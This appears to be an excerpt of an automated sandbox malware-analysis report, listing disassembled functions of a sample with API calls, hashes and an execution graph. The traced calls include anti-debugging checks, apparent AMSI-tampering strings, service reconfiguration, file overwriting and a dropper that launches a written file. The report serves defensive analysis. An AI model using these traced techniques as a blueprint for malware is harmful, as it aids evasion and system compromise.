                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,02ECACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02ECAB2F
                                                                                                                  • Part of subcall function 02ECA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02ECA7E2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$InfoThread
                                                                                                                • String ID: eeee$ggg$yyyy
                                                                                                                • API String ID: 4232894706-1253427255
                                                                                                                • Opcode ID: f1df002cbcd30247318483699630cf465292c145c8412850cea92b722ae29e82
                                                                                                                • Instruction ID: 57b43ff1018d0010ed0d984e0e21a918755cc4540e12944cbdce34c859a3f1fa
                                                                                                                • Opcode Fuzzy Hash: f1df002cbcd30247318483699630cf465292c145c8412850cea92b722ae29e82
                                                                                                                • Instruction Fuzzy Hash: 16418D7068450C4BD711AFF8CBA1AFEB2E7DB81204B34F53DA452C3384EA249D03CA25
                                                                                                                Function 02ED81CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc
                                                                                                                • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                • API String ID: 1883125708-1952140341
                                                                                                                • Opcode ID: 1908b8774fb922f7b8f3f3a5854604203f3b06f79c6bdcc5693a9d5e5976d2a9
                                                                                                                • Instruction ID: b80baa681071f53229c784ba1550a3f9d00612108d9eed27a67991c0d987e463
                                                                                                                • Opcode Fuzzy Hash: 1908b8774fb922f7b8f3f3a5854604203f3b06f79c6bdcc5693a9d5e5976d2a9
                                                                                                                • Instruction Fuzzy Hash: 6AF06D74AC4708AFEB00FBA4DD11E6AF7EDEB4AB40761D865B80483710D670AE128A64
                                                                                                                Function 02EDF6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(KernelBase,?,02EDFAEB,UacInitialize,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,Initialize), ref: 02EDF6EE
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02EDF700
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: IsDebuggerPresent$KernelBase
                                                                                                                • API String ID: 1646373207-2367923768
                                                                                                                • Opcode ID: 0c64bf65f976ef85819f0e7c1d3e9510483231dd0a5987252408b5b1b8bf3bb1
                                                                                                                • Instruction ID: 11b758c0e901745c84c80949149209fc87cf9cf2b01be8f124f3e82922d599dd
                                                                                                                • Opcode Fuzzy Hash: 0c64bf65f976ef85819f0e7c1d3e9510483231dd0a5987252408b5b1b8bf3bb1
                                                                                                                • Instruction Fuzzy Hash: 04D012A13F035029FE00B3F41CC485A038C899452D334BE20F023C64D2E5A688175114
                                                                                                                Function 02ECC474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,02EED10B,00000000,02EED11E), ref: 02ECC47A
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02ECC48B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                • API String ID: 1646373207-3712701948
                                                                                                                • Opcode ID: bc489c1e50232386ba42426cdb17fa43da4d9c1fab3dda097a33bfd5d3c0bb3c
                                                                                                                • Instruction ID: 7d855aef9a7f7e7ee4ee90b3ec0c0e59254c916b0a2ab29d32eeaf2f92542db4
                                                                                                                • Opcode Fuzzy Hash: bc489c1e50232386ba42426cdb17fa43da4d9c1fab3dda097a33bfd5d3c0bb3c
                                                                                                                • Instruction Fuzzy Hash: 70D05EB0AC03549AEA00ABF25680632229CA75C328B78F82EF4154D200E77258628F59
                                                                                                                Function 02ECE1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02ECE297
                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02ECE2B3
                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02ECE32A
                                                                                                                • VariantClear.OLEAUT32(?), ref: 02ECE353
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 920484758-0
                                                                                                                • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                • Instruction ID: a692e594c56c2957b82b17dc20a0280d046f36acc0a25df7ef6e2430174de40d
                                                                                                                • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                • Instruction Fuzzy Hash: 6E415C75A416298FCB66DB98CE90BC9B3BDAF48314F1491D9E50CE7311DA30AF828F50
                                                                                                                Function 02ECAD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02ECAD59
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02ECAD7D
                                                                                                                • GetModuleFileNameA.KERNEL32(02EC0000,?,00000105), ref: 02ECAD98
                                                                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02ECAE2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3990497365-0
                                                                                                                • Opcode ID: 9c32dd27ebb9d7399d15e865ab1e5a5f23f7ac887f74840d25c49fd17b761374
                                                                                                                • Instruction ID: 2afb41221994998c5bf7948ddbe97b44be63dfa6785a2e5c959babc4d7f81580
                                                                                                                • Opcode Fuzzy Hash: 9c32dd27ebb9d7399d15e865ab1e5a5f23f7ac887f74840d25c49fd17b761374
                                                                                                                • Instruction Fuzzy Hash: 8A413D70A8021C9BDB21DF98CE84BDAB7FD9B48304F1490E9A548E7341D7709F858F50
                                                                                                                Function 02ECAD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02ECAD59
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02ECAD7D
                                                                                                                • GetModuleFileNameA.KERNEL32(02EC0000,?,00000105), ref: 02ECAD98
                                                                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02ECAE2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3990497365-0
                                                                                                                • Opcode ID: 9fa309415c7532e735aa4c377f573faccef9bb4a714657771a75e09f5b35b120
                                                                                                                • Instruction ID: ed6621d821b0ccedf1a1d45da7e55e18aa7ccb6ad5f9b9cc5c96762cac6abed8
                                                                                                                • Opcode Fuzzy Hash: 9fa309415c7532e735aa4c377f573faccef9bb4a714657771a75e09f5b35b120
                                                                                                                • Instruction Fuzzy Hash: 35414C70A8021C9FDB21DF98CE84BDAB7FD9B48304F2490E9A548E7341DB709E858F90
                                                                                                                Function 02EC1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bbbdf040acf674eff7b883cc024f2d38dc9892ce3c6239ce3e572bf8f20f733a
                                                                                                                • Instruction ID: db8d5d196a4d951927da4ebee7da12b2fc7c6aebf0814a13c76eb3b75fcdc45f
                                                                                                                • Opcode Fuzzy Hash: bbbdf040acf674eff7b883cc024f2d38dc9892ce3c6239ce3e572bf8f20f733a
                                                                                                                • Instruction Fuzzy Hash: 49A1E8A67906040BD718AAFD9E803ADB7C29B85365F38D27EE11DCF383DB64C9538650
                                                                                                                Function 02EC94EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02EC95DA), ref: 02EC9572
                                                                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02EC95DA), ref: 02EC9578
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DateFormatLocaleThread
                                                                                                                • String ID: yyyy
                                                                                                                • API String ID: 3303714858-3145165042
                                                                                                                • Opcode ID: dcbbcb6ff25a8a4d28b3972e5528b5d490c0898cff37bfe17607bb1e6ffc6a39
                                                                                                                • Instruction ID: fb0d62ec98a81cf44cd1851fed2a7f8d2e0585affc6e36383b414f41ee26553c
                                                                                                                • Opcode Fuzzy Hash: dcbbcb6ff25a8a4d28b3972e5528b5d490c0898cff37bfe17607bb1e6ffc6a39
                                                                                                                • Instruction Fuzzy Hash: 40218071A402189FDB10DFE4CA91ABEB3B9EF08700F6090A9F805E7281D7309E42CB65
                                                                                                                Function 02ED8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02ED83C2), ref: 02ED83A4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                • String ID: FlushInstructionCache$Kernel32
                                                                                                                • API String ID: 3811539418-184458249
                                                                                                                • Opcode ID: 91cfc7442f5330227bbe8ca8873b7f6f861e2f23f860da113d6a66e3b1c2fa59
                                                                                                                • Instruction ID: a4eed94e0f19b48ca6d366fb6588def3ab023ab3ac061aee756fb8ff3bf53997
                                                                                                                • Opcode Fuzzy Hash: 91cfc7442f5330227bbe8ca8873b7f6f861e2f23f860da113d6a66e3b1c2fa59
                                                                                                                • Instruction Fuzzy Hash: F6016D756C4308BFE700EFE5DC51FAAB7EDE748B00F61A460B904D6640D670AD128A24
                                                                                                                Function 02EDAF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02EDAF58
                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004), ref: 02EDAF88
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000008), ref: 02EDAFA7
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02EDAFB3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Read$Write
                                                                                                                • String ID:
                                                                                                                • API String ID: 3448952669-0
                                                                                                                • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                • Instruction ID: 919ba14528f06e600b292c3f9357927b92bf6a497c9c37afe341c08563d91c70
                                                                                                                • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                • Instruction Fuzzy Hash: D321B7B2680619AFDB10DF6ACD80BAF736AEF80315F10D561FD1497380D734E9128690

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2%
                                                                                                                Dynamic/Decrypted Code Coverage:96.7%
                                                                                                                Signature Coverage:5.7%
                                                                                                                Total number of Nodes:1084
                                                                                                                Total number of Limit Nodes:20
                                                                                                                execution_graph 8828 401000 malloc 8829 401031 8828->8829 9751 10011d00 9757 10010fb0 9751->9757 9758 100110d9 9751->9758 9753 10011300 9754 10005d20 2 API calls 9753->9754 9756 10011307 9754->9756 9755 10005d20 2 API calls 9755->9757 9757->9751 9757->9753 9757->9755 9757->9758 9760 10010fb0 9757->9760 9769 10045b2d 9757->9769 9762 10010fe9 9760->9762 9761 10005d20 2 API calls 9761->9762 9762->9757 9762->9760 9762->9761 9763 10010fb0 7 API calls 9762->9763 9764 10045b2d 5 API calls 9762->9764 9765 10011300 9762->9765 9768 100110d9 9762->9768 9763->9762 9764->9762 9766 10005d20 2 API calls 9765->9766 9767 10011307 9766->9767 9767->9757 9768->9757 9772 10046229 9769->9772 9771 10045b3f 9771->9757 9775 10046254 9772->9775 9773 10044c0d _abort 5 API calls 9774 10046345 9773->9774 9774->9771 9775->9773 9735 100400c0 9738 100400d9 9735->9738 9737 100400d7 9740 1004014c 9738->9740 9739 10041a1b 21 API calls 9741 100408d6 9739->9741 9740->9739 9742 1004032f 9740->9742 9741->9737 9742->9737 9150 10005085 9151 10005089 9150->9151 9152 1000506f 9150->9152 9155 10028550 9152->9155 9154 10005078 9158 10028556 9155->9158 9156 10028145 GetLastError 9168 10027dd7 9156->9168 9157 10028986 SetEntriesInAclW 9157->9158 9158->9155 9158->9156 9158->9157 9161 10028bc1 GetLastError 9158->9161 9162 1002890b LocalFree 9158->9162 9163 100289cd OpenMutexW 9158->9163 9166 10027d37 9158->9166 9158->9168 9171 10027d30 9158->9171 9173 10027d20 9158->9173 9174 10028599 9158->9174 9176 1002896a wsprintfW 9158->9176 9177 10028953 AllocateAndInitializeSid 9158->9177 9178 10028f87 wsprintfW 9158->9178 9159 100283fb GetUserNameW 9159->9168 9160 10028209 GetUserNameW 9160->9166 9160->9168 9161->9158 9162->9158 9163->9154 9164 10028248 9167 1002824a GetLastError 9164->9167 9166->9154 9167->9154 9168->9156 9168->9159 9168->9160 9168->9164 9168->9166 9168->9167 9169 1002836e GetLastError 9168->9169 9170 10027d6c GetVolumeInformationW 9168->9170 9168->9171 9172 10027fd4 GetLastError 9168->9172 9168->9173 9180 10027f6b GetVolumeInformationW 9168->9180 9169->9168 9170->9154 9171->9166 9171->9170 9172->9168 9173->9166 9173->9170 9173->9171 9175 10027d83 GetWindowsDirectoryW 9173->9175 9179 10027e06 GetComputerNameW 9173->9179 9174->9171 9174->9176 9175->9166 9175->9171 9176->9171 9177->9158 9178->9166 9179->9166 9180->9168 9181 10006086 SetFilePointerEx 9183 10005f10 9181->9183 9182 10006084 SetFilePointerEx 9182->9183 9183->9182 9184 10005d90 9183->9184 10090 10005fc7 10092 10005f10 10090->10092 10091 10006084 SetFilePointerEx 10091->10092 10092->10091 10093 10005d90 10092->10093 10093->10093 9693 10005648 9696 10008250 GetCurrentProcess 9693->9696 9695 1000564f 9696->9695 9721 1004708e RtlUnwind 9697 1000604f 9699 10005f10 9697->9699 9698 10006084 SetFilePointerEx 9698->9699 9699->9698 9700 10005d90 9699->9700 9795 10006b50 9796 10006b57 9795->9796 9798 10005f10 9795->9798 9797 10006084 SetFilePointerEx 9797->9798 9798->9797 9799 10005d90 9798->9799 9074 1002cbd0 9075 1002be50 _wcslen 9074->9075 9075->9074 9076 1002bfe9 9075->9076 9077 1002c168 9075->9077 9079 10005d20 2 API calls 9075->9079 9080 1002c78e CloseServiceHandle 9075->9080 9081 1002bffd StrStrIW 9075->9081 9082 1002c706 StrStrIW 9075->9082 9084 1002bf68 StrStrIW 9075->9084 9085 1002c72b StrStrIW 9075->9085 9086 1002c399 StrStrIW 9075->9086 9088 1002c0fd CloseServiceHandle 9075->9088 9090 1002c7e4 StartServiceW 9075->9090 9092 1002bf7e 9075->9092 9093 1002c65a ChangeServiceConfigW 9075->9093 9094 1000ce90 9075->9094 9112 1002a350 9075->9112 9116 1002a9a0 9077->9116 9079->9075 9080->9075 9081->9075 9082->9075 9084->9075 9085->9075 9086->9075 9089 1002c3a9 9086->9089 9088->9075 9090->9075 9091 1002c36b OpenServiceW 9091->9075 9092->9090 9092->9091 9093->9075 9093->9076 9100 1000cc9b _wcslen 9094->9100 9095 1000d729 GetFileSizeEx 9099 1000d8a1 CloseHandle 9095->9099 9095->9100 9096 1000cc92 9096->9075 9097 10005d20 VirtualAlloc VirtualFree 9097->9100 9098 1000d5c5 CreateFileW 9098->9100 9099->9100 9100->9075 9100->9094 9100->9095 9100->9096 9100->9097 9100->9098 9100->9099 9101 1000d42a CloseHandle 9100->9101 9103 1000cd5c lstrcmpiW 9100->9103 9104 1000cca0 lstrcmpiW 9100->9104 9106 1000d049 SetFilePointerEx 9100->9106 9107 1000d378 CloseHandle 9100->9107 9108 1000d426 9100->9108 9109 1000cfbb GetFileTime 9100->9109 9111 1000d903 9100->9111 9120 100089a0 9100->9120 9125 10008470 9100->9125 9101->9100 9103->9100 9104->9100 9106->9100 9107->9100 9108->9099 9108->9101 9109->9100 9110 1003fdfc 40 API calls 9110->9111 9111->9096 9111->9110 9114 1002a356 9112->9114 9113 1002a707 CloseServiceHandle 9115 1002a389 9113->9115 9114->9113 9114->9115 9115->9075 9118 1002a905 9116->9118 9119 1002a907 9116->9119 9117 1002a92e LocalFree 9117->9118 9118->9076 9118->9116 9118->9117 9118->9119 9119->9076 9122 100089a4 9120->9122 9121 10005d20 2 API calls 9121->9122 9122->9120 9122->9121 9123 100084c0 2 API calls 9122->9123 9124 10008937 9122->9124 9123->9122 9124->9100 9126 10005d20 2 API calls 9125->9126 9128 10008481 9126->9128 9127 100084c0 2 API calls 9127->9128 9128->9127 9129 100084b4 9128->9129 9130 10011d60 2 API calls 9128->9130 9131 10005d20 VirtualAlloc VirtualFree 9128->9131 9129->9100 9129->9129 9130->9128 9131->9128 10082 10004f92 10083 10005d20 2 API calls 10082->10083 10084 10004f99 10083->10084 9185 401453 _XcptFilter 9800 10048b50 9803 10048b6e 9800->9803 9802 10048b66 9804 10048b73 9803->9804 9805 10041a1b 21 API calls 9804->9805 9807 10048c08 9804->9807 9806 10048d9f 9805->9806 9806->9802 9807->9802 9776 401155 9777 401164 strcmp 9776->9777 9778 401141 9776->9778 9780 401191 EntryPoint strcpy 9777->9780 9781 4011db EntryPoint getenv EntryPoint sprintf 9777->9781 9778->9777 9779 40134e 9778->9779 9782 40126b fopen EntryPoint fwrite fclose 9780->9782 9781->9782 9783 401310 EntryPoint ShellExecuteA 9782->9783 9784 401349 9782->9784 9783->9784 9785 10005b15 9786 10005b17 9785->9786 9787 10005d20 2 API calls 